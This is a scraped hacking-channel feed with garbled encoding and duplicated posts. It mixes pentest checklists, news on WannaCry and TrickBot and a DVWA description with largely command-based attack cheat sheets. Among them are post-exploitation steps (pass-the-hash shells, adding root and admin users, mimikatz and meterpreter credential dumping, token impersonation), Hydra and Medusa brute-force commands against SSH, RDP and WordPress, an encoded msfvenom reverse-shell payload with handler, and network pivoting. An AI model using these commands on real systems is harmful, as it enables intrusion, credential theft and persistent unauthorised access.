β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦checkout the Authentication steps :
Test for user enumeration
Test for authentication bypass
Test for bruteforce protection
Test password quality rules
Test remember me functionality
Test for autocomplete on password forms/input
Test password reset and/or recovery
Test password change process
Test CAPTCHA
Test multi factor authentication
Test for logout functionality presence
Test for cache management on HTTP (eg Pragma, Expires, Max-age)
Test for default logins
Test for user-accessible authentication history
Test for out-of channel notification of account lockouts and
successful password changes
Test for consistent authentication across applications with
shared authentication schema / SSO
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦checkout the Authentication steps :
Test for user enumeration
Test for authentication bypass
Test for bruteforce protection
Test password quality rules
Test remember me functionality
Test for autocomplete on password forms/input
Test password reset and/or recovery
Test password change process
Test CAPTCHA
Test multi factor authentication
Test for logout functionality presence
Test for cache management on HTTP (eg Pragma, Expires, Max-age)
Test for default logins
Test for user-accessible authentication history
Test for out-of channel notification of account lockouts and
successful password changes
Test for consistent authentication across applications with
shared authentication schema / SSO
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦All steps for Data Validation
Test for Reflected Cross Site Scripting
Test for Stored Cross Site Scripting
Test for DOM based Cross Site Scripting
Test for Cross Site Flashing
Test for HTML Injection
Test for SQL Injection
Test for LDAP Injection
Test for ORM Injection
Test for XML Injection
Test for XXE Injection
Test for SSI Injection
Test for XPath Injection
Test for XQuery Injection
Test for IMAP/SMTP Injection
Test for Code Injection
Test for Expression Language Injection
Test for Command Injection
Test for Overflow (Stack, Heap and Integer)
Test for Format String
Test for incubated vulnerabilities
Test for HTTP Splitting/Smuggling
Test for HTTP Verb Tampering
Test for Open Redirection
Test for Local File Inclusion
Test for Remote File Inclusion
Compare client-side and server-side validation rules
Test for NoSQL injection
Test for HTTP parameter pollution
Test for auto-binding
Test for Mass Assignment
Test for NULL/Invalid Session Cookie
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦All steps for Data Validation
Test for Reflected Cross Site Scripting
Test for Stored Cross Site Scripting
Test for DOM based Cross Site Scripting
Test for Cross Site Flashing
Test for HTML Injection
Test for SQL Injection
Test for LDAP Injection
Test for ORM Injection
Test for XML Injection
Test for XXE Injection
Test for SSI Injection
Test for XPath Injection
Test for XQuery Injection
Test for IMAP/SMTP Injection
Test for Code Injection
Test for Expression Language Injection
Test for Command Injection
Test for Overflow (Stack, Heap and Integer)
Test for Format String
Test for incubated vulnerabilities
Test for HTTP Splitting/Smuggling
Test for HTTP Verb Tampering
Test for Open Redirection
Test for Local File Inclusion
Test for Remote File Inclusion
Compare client-side and server-side validation rules
Test for NoSQL injection
Test for HTTP parameter pollution
Test for auto-binding
Test for Mass Assignment
Test for NULL/Invalid Session Cookie
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
300+ Powerful Termux Hacking Tools For Hackers .pdf
374.4 KB
300+ Powerful Termux Hacking Tools For Hackers
#Requested
#Requested
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Risky Functionality - Card Payment
#FastTips
>Test for known vulnerabilities and configuration issues on Web Server and Web Application
Test for default or guessable password
Test for non-production data in live environment, and vice-versa
Test for Injection vulnerabilities
Test for Buffer Overflows
Test for Insecure Cryptographic Storage
Test for Insufficient Transport Layer Protection
Test for Improper Error Handling
Test for all vulnerabilities with a CVSS v2 score > 4.0
Test for Authentication and Authorization issues
Test for CSRF
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Risky Functionality - Card Payment
#FastTips
>Test for known vulnerabilities and configuration issues on Web Server and Web Application
Test for default or guessable password
Test for non-production data in live environment, and vice-versa
Test for Injection vulnerabilities
Test for Buffer Overflows
Test for Insecure Cryptographic Storage
Test for Insufficient Transport Layer Protection
Test for Improper Error Handling
Test for all vulnerabilities with a CVSS v2 score > 4.0
Test for Authentication and Authorization issues
Test for CSRF
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Remote Information Services
1οΈβ£DNS
Zone Transfer - host -l securitymuppets.com 192.168.100.2
Metasploit Auxiliarys:
auxiliary/gather/enumdns
use auxiliary/gather/dns...
2οΈβ£ Finger - Enumerate Users
finger @192.168.0.1
finger -l -p user@ip-address
auxiliary/scanner/finger/fingerusers
3οΈβ£ NTP
Metasploit Auxiliarys
4οΈβ£ SNMP
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmpenum
snmpcheck -t snmpservice
5οΈβ£ rservices
rwho 192.168.0.1
rlogin -l root 192.168.0.17
6οΈβ£ RPC Services
rpcinfo -p
Endpointmapper metasploit
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Remote Information Services
1οΈβ£DNS
Zone Transfer - host -l securitymuppets.com 192.168.100.2
Metasploit Auxiliarys:
auxiliary/gather/enumdns
use auxiliary/gather/dns...
2οΈβ£ Finger - Enumerate Users
finger @192.168.0.1
finger -l -p user@ip-address
auxiliary/scanner/finger/fingerusers
3οΈβ£ NTP
Metasploit Auxiliarys
4οΈβ£ SNMP
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmpenum
snmpcheck -t snmpservice
5οΈβ£ rservices
rwho 192.168.0.1
rlogin -l root 192.168.0.17
6οΈβ£ RPC Services
rpcinfo -p
Endpointmapper metasploit
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
CVE_2019_7315_Genie_Access_WIP3BVAF_IP_Camera_Directory_Traversal.pdf
767.6 KB
CVE-2019-7315_ Genie Access WIP3BVAF IP Camera Directory Traversal
> full tutorial
> full tutorial
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Random Helpul tips
> Post Exploitation
1οΈβ£ Command prompt access on Windows Host
pth-winexe -U Administrator%<hash> //<host ip> cmd.exe
2οΈβ£ Add Linux User
/usr/sbin/useradd βg 0 βu 0 βo user
echo user:password | /usr/sbin/chpasswd
3οΈβ£ Add Windows User
net user username password@1 /add
net localgroup administrators username /add
4οΈβ£ Solaris Commands
useradd -o user
passwd user
usermod -R root user
5οΈβ£ Dump remote SAM:
PwDump.exe -u localadmin 192.168.0.1
6οΈβ£ Mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords full
7οΈβ£ Meterpreter
meterpreter> run winenum
meterpreter> use post/windows/gather/smarthashdump
meterpreter > use incognito
meterpreter > listtokens -u
meterpreter > impersonatetoken TVM\domainadmin
meterpreter > adduser hacker password1 -h 192.168.0.10
meterpreter > addgroupuser "Domain Admins" hacker -h 192.168.0.10
meterpreter > load mimikatz
meterpreter > wdigest
meterpreter > getWdigestPasswords
Migrate if does not work!
8οΈβ£ Kitrap0d
Download vdmallowed.exe and vdmexploit.dll to victim
Run vdmallowed.exe to execute system shell
9οΈβ£ Windows Information
On Windows:
ipconfig /all
systeminfo
net localgroup administrators
net view
net view /domain
π SSH Tunnelling
Remote forward port 222
ssh -R 127.0.0.1:4444:10.1.1.251:222 -p 443 root@192.168.10.118
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Random Helpul tips
> Post Exploitation
1οΈβ£ Command prompt access on Windows Host
pth-winexe -U Administrator%<hash> //<host ip> cmd.exe
2οΈβ£ Add Linux User
/usr/sbin/useradd βg 0 βu 0 βo user
echo user:password | /usr/sbin/chpasswd
3οΈβ£ Add Windows User
net user username password@1 /add
net localgroup administrators username /add
4οΈβ£ Solaris Commands
useradd -o user
passwd user
usermod -R root user
5οΈβ£ Dump remote SAM:
PwDump.exe -u localadmin 192.168.0.1
6οΈβ£ Mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords full
7οΈβ£ Meterpreter
meterpreter> run winenum
meterpreter> use post/windows/gather/smarthashdump
meterpreter > use incognito
meterpreter > listtokens -u
meterpreter > impersonatetoken TVM\domainadmin
meterpreter > adduser hacker password1 -h 192.168.0.10
meterpreter > addgroupuser "Domain Admins" hacker -h 192.168.0.10
meterpreter > load mimikatz
meterpreter > wdigest
meterpreter > getWdigestPasswords
Migrate if does not work!
8οΈβ£ Kitrap0d
Download vdmallowed.exe and vdmexploit.dll to victim
Run vdmallowed.exe to execute system shell
9οΈβ£ Windows Information
On Windows:
ipconfig /all
systeminfo
net localgroup administrators
net view
net view /domain
π SSH Tunnelling
Remote forward port 222
ssh -R 127.0.0.1:4444:10.1.1.251:222 -p 443 root@192.168.10.118
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Password Attacks Tips :
1οΈβ£Convert multiple webpages into a word list:
for x in 'index' 'about' 'post' 'contact' ; do curl
http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>
webapp.txt ; done
Or convert html to word list dict
html2dic index.html.out | sort -u > index-html.dict
2οΈβ£Bruteforcing http password prompts
medusa -h <ip/host> -u <user> -P <password list> -M http -n <port> -m DIR:/<directory> -T 30
3οΈβ£ Medusa
# To display all currently installed modules
medusa -d
# Display specific options for a module
medusa -M module_name -q
4οΈβ£ Test all passwords in password file against the admin user on the host
# 192.168.1.20 via the SMB | SSH | MySQL | HTTP service
medusa -h 192.168.1.20 -u admin -P passwords.txt -M smbnt | ssh | mssql | http
5οΈβ£ To brute force 10 hosts and 5 users concurrently (using Medusa's parallel features)
# Each of the 5 threads targeting a host will check a specific user
medusa -H hosts.txt -U users.txt -P passwords.txt -T 10 -t 5 -L -F -M smbnt
6οΈβ£ Medusa allows username, password, and host data to be placed within the same file (the "combo" file).
# Possible combinations in the combo file:
# host:username:password
# host:username:
# host::
# :username:password
# :username:
# ::password
# host::password
# :id:lm:ntlm::: (PwDump files)
# To test each username/password entry in the file combo.txt
medusa -M smbnt -C combo.txt
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Password Attacks Tips :
1οΈβ£Convert multiple webpages into a word list:
for x in 'index' 'about' 'post' 'contact' ; do curl
http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>
webapp.txt ; done
Or convert html to word list dict
html2dic index.html.out | sort -u > index-html.dict
2οΈβ£Bruteforcing http password prompts
medusa -h <ip/host> -u <user> -P <password list> -M http -n <port> -m DIR:/<directory> -T 30
3οΈβ£ Medusa
# To display all currently installed modules
medusa -d
# Display specific options for a module
medusa -M module_name -q
4οΈβ£ Test all passwords in password file against the admin user on the host
# 192.168.1.20 via the SMB | SSH | MySQL | HTTP service
medusa -h 192.168.1.20 -u admin -P passwords.txt -M smbnt | ssh | mssql | http
5οΈβ£ To brute force 10 hosts and 5 users concurrently (using Medusa's parallel features)
# Each of the 5 threads targeting a host will check a specific user
medusa -H hosts.txt -U users.txt -P passwords.txt -T 10 -t 5 -L -F -M smbnt
6οΈβ£ Medusa allows username, password, and host data to be placed within the same file (the "combo" file).
# Possible combinations in the combo file:
# host:username:password
# host:username:
# host::
# :username:password
# :username:
# ::password
# host::password
# :id:lm:ntlm::: (PwDump files)
# To test each username/password entry in the file combo.txt
medusa -M smbnt -C combo.txt
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Hydra bruteforcing tips
1οΈβ£hydra does not have a native default wordlist, using the Rockyou list is suggested
#example brute force crack on ftp server
hydra -t 1 -l admin -P path to password.lst -vV IPaddress ftp
--> -t # = preform # tasks
--> -l NAME = try to log in with NAME
--> -P filepath = Try password
--> -vV = verbose mode, showing the login+pass for each attempt
2οΈβ£check for joe accounts by adding modifier -e s
3οΈβ£Hydra brute force against SNMP
hydra -P password-file.txt -v $ip snmp
4οΈβ£Hydra FTP known user and password list
hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp
5οΈβ£Hydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
6οΈβ£Hydra SSH using a known password and a username list
hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh
7οΈβ£Hydra SSH Against Known username on port 22
hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt
8οΈβ£Hydra POP3 Brute Force
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V
9οΈβ£Hydra SMTP Brute Force
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
πHydra attack http get 401 login with a dictionary
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
1οΈβ£1οΈβ£Hydra attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
1οΈβ£2οΈβ£Hydra brute force a Wordpress admin login
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Hydra bruteforcing tips
1οΈβ£hydra does not have a native default wordlist, using the Rockyou list is suggested
#example brute force crack on ftp server
hydra -t 1 -l admin -P path to password.lst -vV IPaddress ftp
--> -t # = preform # tasks
--> -l NAME = try to log in with NAME
--> -P filepath = Try password
--> -vV = verbose mode, showing the login+pass for each attempt
2οΈβ£check for joe accounts by adding modifier -e s
3οΈβ£Hydra brute force against SNMP
hydra -P password-file.txt -v $ip snmp
4οΈβ£Hydra FTP known user and password list
hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp
5οΈβ£Hydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
6οΈβ£Hydra SSH using a known password and a username list
hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh
7οΈβ£Hydra SSH Against Known username on port 22
hydra $ip -s 22 ssh -l <user> -P big_wordlist.txt
8οΈβ£Hydra POP3 Brute Force
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V
9οΈβ£Hydra SMTP Brute Force
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
πHydra attack http get 401 login with a dictionary
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
1οΈβ£1οΈβ£Hydra attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
1οΈβ£2οΈβ£Hydra brute force a Wordpress admin login
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
enjoyβ€οΈππ»
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
Beating_Windows_Defender_Analysis_of_Metasploit's_new_evasion_modules.pdf
1.8 MB
Beating Windows Defender. Analysis of Metasploit's new evasion modules.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦RANDOM CRACKING RECOMMENDED TIPS :
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦RANDOM CRACKING RECOMMENDED TIPS :
#Ophcrack is a free rainbow table-based password cracking tool for Windows 8 (both local and Microsoft accounts), Windows 7, Windows Vista, and Windows XP.enjoyβ€οΈππ»
#The Ophcrack LiveCD option allows for completely automatic password recovery.
#It cracks LM and NTLM (Windows) hashes.
2οΈβ£Pros
Software is freely available for download online
Passwords are recovered automatically using the LiveCD method
No software installation is necessary to recover passwords
No knowledge of any existing passwords is necessary
3οΈβ£Cons
LiveCD ISO image must be burned to a disc or USB device before being used
Passwords greater than 14 characters cannot be cracked
Won't crack even the simplest Windows 10 password
4οΈβ£ RainbowCrack
#The RainbowCrack software cracks hashes by rainbow table lookup.
#To crack single hash
rcrack [rainbow_table_path] -h hash_to_be_cracked
Path - Location of rainbow tables
Example: rcrack c:\rt -h fcea920f7412b5da7be0cf42b8c93759
#To crack multiple hashes in a file
rcrack [rainbow_table_path] -l hash_file
Example: rcrack c:\rt -l hash_list_file
#To lookup rainbow tables in multiple directories
rcrack [rainbow_table_path] [rainbow_table_path2] -l hash_file
Example: rcrack c:\rt1 c:\rt2 -l hash_list_file
#To load and crack LM hashes from pwdump file
rcrack [rainbow_table_path] -lm pwdump_file
#To load and crack NTLM hashes from pwdump file
rcrack [rainbow_table_path] -ntlm pwdump_file
5οΈβ£ acccheck
#Windows Password dictionary attack tool for SMB
#Usage: acccheck [options]
options -t [single host IP address]
-T [file containing target ip address(es)]
-p [single password]
-P [file containing passwords]
-u [single user]
-U [file containing usernames]
#Examples
Attempt the 'Administrator' account with a [BLANK] password.
acccheck -t 10.10.10.1
Attempt all passwords in 'password.txt' against the 'Administrator' account.
acccheck -t 10.10.10.1 -P password.txt
Attempt all password in 'password.txt' against all users in 'users.txt'.
acccehck -t 10.10.10.1 -U users.txt -P password.txt
Attempt a single password against a single user.
acccheck -t 10.10.10.1 -u administrator -p password
6οΈβ£Brutespray
#BruteSpray takes nmap GNMAP/XML output and automatically brute-forces services with default credentials using Medusa.
#usage: brutespray [-h] -f FILE [-o OUTPUT] [-s SERVICE] [-t THREADS]
[-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME]
[-p PASSWORD] [-c] [-i]
#Example
brutespray --file nas.gnmap -U /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/password.lst --threads 3 --hosts 1
Attack all services in nas.gnmap with a specific user list (unix_users.txt) and password list (password.lst).
7οΈβ£Crowbar
#Crowbar is a brute force tool which supports OpenVPN, Remote Desktop Protocol, SSH Private Keys and VNC Keys.
#usage: crowbar -b [openvpn | rdp | sshkey | vnckey] [arguments]
Example:crowbar -b rdp -s 192.168.86.61/32 -u victim -C /root/words.txt -n 1
Brute force the RDP service on a single host with a specified username and wordlist, using 1 thread.
8οΈβ£Aircrack-ng
#Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.
#usage
aircrack-ng [options] <.cap / .ivs file(s)>
To have aircrack-ng conduct a WEP key attack on a capture file, pass it the filename, either in .ivs or .cap/.pcap format.
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ALL RELATED TO METASPLOIT :
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ALL RELATED TO METASPLOIT :
enjoyβ€οΈππ»
# To show all exploits that for a vulnerability
grep <vulnerability> show exploits
# To select an exploit to use
use <exploit>
# To see the current settings for a selected exploit
show options
# To see compatible payloads for a selected exploit
show payloads
# To set the payload for a selected exploit
set payload <payload>
# To set setting for a selected exploit
set <option> <value>
# To run the exploit
exploit
# One liner to create/generate a payload for windows
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=<listening_host> LPORT=<listening_port> --bad-chars β\x00β --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/
# One liner start meterpreter
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"
2οΈβ£Metasploit Pivot
Compromise 1st machine
# meterpreter> run arp_scanner -r 10.10.10.0/24
route add 10.10.10.10 255.255.255.248 <session>
use auxiliary/scanner/portscan/tcp
use bind shell
or run autoroute:
# meterpreter > ipconfig
# meterpreter > run autoroute -s 10.1.13.0/24
# meterpreter > getsystem
# meterpreter > run hashdump
# use auxiliary/scanner/portscan/tcp
# msf auxiliary(tcp) > use exploit/windows/smb/psexec
or port forwarding:
# meterpreter > run autoroute -s 10.1.13.0/24
# use auxiliary/scanner/portscan/tcp
# meterpreter > portfwd add -l <listening port> -p <remote port> -r <remote/internal host>
or socks proxy:
route add 10.10.10.10 255.255.255.248 <session>
use auxiliary/server/socks4a
Add proxy to /etc/proxychains.conf
proxychains nmap -sT -T4 -Pn 10.10.10.50
setg socks4:127.0.0.1:1080
β git 2020
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
mega.nz
3.72 GB folder on MEGA
122 files and 20 subfolders
Analysis of a Trojan downloader.pdf
3.3 MB
More related to Trojans
-Analysis of a Trojan downloader
-Analysis of a Trojan downloader
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Description of Damn Vulnerable Web Application (DVWA)
Damn Vulnerable Web Application (DVWA) is a PHP / MySQL web application that's damn vulnerable. Its main goal is to help security professionals test their skills and tools in a legal environment, help web developers better understand the process of web application security, and help both students and teachers learn about web application security in a controlled classroom environment.
The DVWA's goal is to practice some of the most common web vulnerabilities, with varying levels of difficulty, with a simple straightforward interface. Please note that there are both documented and undocumented vulnerabilities in this software. This is done on purpose. You are encouraged to try and discover as many vulnerabilities as you can.
WARNING!
> Damn Vulnerable Web Application is damn vulnerable! Do not upload it to the public html folder of your hosting provider or to any server with Internet access, as they will be compromised. It is recommended to use a virtual machine (such as VirtualBox or VMware) that are set to NAT network mode. Inside the guest machine, you can download and install the web server and databases.
π¦Some of the vulnerabilities of the web application that contains DVWA;
β Brute force : Brute force HTTP login page form; is used to test password brute force attack tools and shows the insecurity of weak passwords.
βCommand execution (injection) : Execution of operating system level commands.
βCross-Site Request Forgery (CSRF): Allows an "attacker" to change the Application Administrator password.
File Injection : Allows an "attacker" to attach remote / local files to a web application.
βSQL Injection: Allows an attacker to inject SQL statements into HTTP from an input field, DVWA enables blind and error-based SQL injection.
βInsecure File Upload : Allows an "attacker" to upload malicious files to a web server.
βCross Site Scripting (XSS) : An attacker can inject their scripts into a web application / database. DVWA includes reflected and stored XSS.
βEaster eggs: revealing full paths, bypassing authentication, and some others.
> Home page: http://dvwa.co.uk/
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Description of Damn Vulnerable Web Application (DVWA)
Damn Vulnerable Web Application (DVWA) is a PHP / MySQL web application that's damn vulnerable. Its main goal is to help security professionals test their skills and tools in a legal environment, help web developers better understand the process of web application security, and help both students and teachers learn about web application security in a controlled classroom environment.
The DVWA's goal is to practice some of the most common web vulnerabilities, with varying levels of difficulty, with a simple straightforward interface. Please note that there are both documented and undocumented vulnerabilities in this software. This is done on purpose. You are encouraged to try and discover as many vulnerabilities as you can.
WARNING!
> Damn Vulnerable Web Application is damn vulnerable! Do not upload it to the public html folder of your hosting provider or to any server with Internet access, as they will be compromised. It is recommended to use a virtual machine (such as VirtualBox or VMware) that are set to NAT network mode. Inside the guest machine, you can download and install the web server and databases.
π¦Some of the vulnerabilities of the web application that contains DVWA;
β Brute force : Brute force HTTP login page form; is used to test password brute force attack tools and shows the insecurity of weak passwords.
βCommand execution (injection) : Execution of operating system level commands.
βCross-Site Request Forgery (CSRF): Allows an "attacker" to change the Application Administrator password.
File Injection : Allows an "attacker" to attach remote / local files to a web application.
βSQL Injection: Allows an attacker to inject SQL statements into HTTP from an input field, DVWA enables blind and error-based SQL injection.
βInsecure File Upload : Allows an "attacker" to upload malicious files to a web server.
βCross Site Scripting (XSS) : An attacker can inject their scripts into a web application / database. DVWA includes reflected and stored XSS.
βEaster eggs: revealing full paths, bypassing authentication, and some others.
> Home page: http://dvwa.co.uk/
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WannaCry|WannaDecrypt0r NSA-Cybereweapon-Powered Ransomware Worm
1) Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
2) Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
3) Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
4) Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. (source: malwarebytes)
> Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm.
5) SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx https://blog.malwarebytes.com/threat-analysis/2017/05/the-worm-that-spreads-wanacrypt0r/
ENJOYβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WannaCry|WannaDecrypt0r NSA-Cybereweapon-Powered Ransomware Worm
1) Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
2) Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
3) Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
4) Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. (source: malwarebytes)
> Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm.
5) SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx https://blog.malwarebytes.com/threat-analysis/2017/05/the-worm-that-spreads-wanacrypt0r/
ENJOYβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
Malwarebytes Labs
The worm that spreads WanaCrypt0r
WanaCrypt0r is a ransomware infection that has spread through many corporate networks. Read a technical analysis of the worm that allowed it to do this.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Canadian MSP disclosed data breach, ransomware attack failed
#News
TrickBotβs Anchor malware platform has been ported to Linux-infected devices and used secret channels to destroy more high-impact and high-value targets.
> TrickBot is a multifunctional Windows malware platform that uses different modules to perform various malicious activities, including information theft, password theft, Windows domain infiltration and malware delivery.
TrickBot is rented by threat actors who use threats to penetrate the network and harvest anything of value. It is then used to deploy ransomware such as Ryuk and Conti to encrypt network devices as a final attack.
> At the end of 2019, both SentinelOne and NTT reported a new TrickBot framework called Anchor, which uses DNS to communicate with command and control servers.
> The malware is called Anchor_DNS and can be used for high-value, high-impact targets with valuable financial information.
In addition to ransomware deployment through Anchor infection, TrickBot Anchor participants also use it as a backdoor program for APT, point of sale and financial system activities
written by undercode
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Canadian MSP disclosed data breach, ransomware attack failed
#News
TrickBotβs Anchor malware platform has been ported to Linux-infected devices and used secret channels to destroy more high-impact and high-value targets.
> TrickBot is a multifunctional Windows malware platform that uses different modules to perform various malicious activities, including information theft, password theft, Windows domain infiltration and malware delivery.
TrickBot is rented by threat actors who use threats to penetrate the network and harvest anything of value. It is then used to deploy ransomware such as Ryuk and Conti to encrypt network devices as a final attack.
> At the end of 2019, both SentinelOne and NTT reported a new TrickBot framework called Anchor, which uses DNS to communicate with command and control servers.
> The malware is called Anchor_DNS and can be used for high-value, high-impact targets with valuable financial information.
In addition to ransomware deployment through Anchor infection, TrickBot Anchor participants also use it as a backdoor program for APT, point of sale and financial system activities
written by undercode
β β β Uππ»βΊπ«Δπ¬πβ β β β